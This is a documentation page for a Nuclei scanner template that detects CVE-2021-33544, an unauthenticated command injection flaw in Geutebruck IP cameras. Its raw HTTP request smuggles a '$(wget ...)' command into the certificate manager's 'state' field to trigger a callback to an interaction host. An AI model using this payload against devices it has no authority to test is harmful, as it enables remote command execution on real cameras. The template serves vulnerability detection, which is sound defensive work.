Geutebruck - Remote Command Injection
ID: CVE-2021-33544
Severity: high
Author: gy741
Tags: cve2021,cve,geutebruck,rce,oast,geutebrueck
Description
Section titled “Description”Geutebruck is susceptible to multiple vulnerabilities its web-based management interface that could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.
YAML Source
Section titled “YAML Source”id: CVE-2021-33544
info: name: Geutebruck - Remote Command Injection author: gy741 severity: high description: Geutebruck is susceptible to multiple vulnerabilities its web-based management interface that could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device. impact: | Successful exploitation of this vulnerability allows an attacker to execute arbitrary commands on the affected device, leading to unauthorized access, data theft, or further compromise of the network. remediation: | Apply the latest security patches or firmware updates provided by Geutebruck to mitigate the vulnerability. reference: - https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/ - https://www.randorisec.fr/fr/udp-technology-ip-camera-vulnerabilities/ - https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03 - https://nvd.nist.gov/vuln/detail/CVE-2021-33544 - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.2 cve-id: CVE-2021-33544 cwe-id: CWE-78 epss-score: 0.97493 epss-percentile: 0.99976 cpe: cpe:2.3:h:geutebrueck:g-cam_ebc-2110:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: geutebrueck product: g-cam_ebc-2110 tags: cve2021,cve,geutebruck,rce,oast,geutebrueck
http: - raw: - | GET //uapi-cgi/certmngr.cgi?action=createselfcert&local=anything&country=AA&state=%24(wget%20http://{{interactsh-url}})&organization=anything&organizationunit=anything&commonname=anything&days=1&type=anything HTTP/1.1 Host: {{Hostname}} Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
matchers: - type: word part: interactsh_protocol # Confirms the HTTP Interaction words: - "http"# digest: 4b0a00483046022100eaefd855282c43086156507d1f36b2834db5b13307d9d26d3ce35eb8d2912002022100da41f54b60a9983edaed120c0cd2d86110b0195fb4a8fa7134ea0beb41a7e633:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-33544.yaml"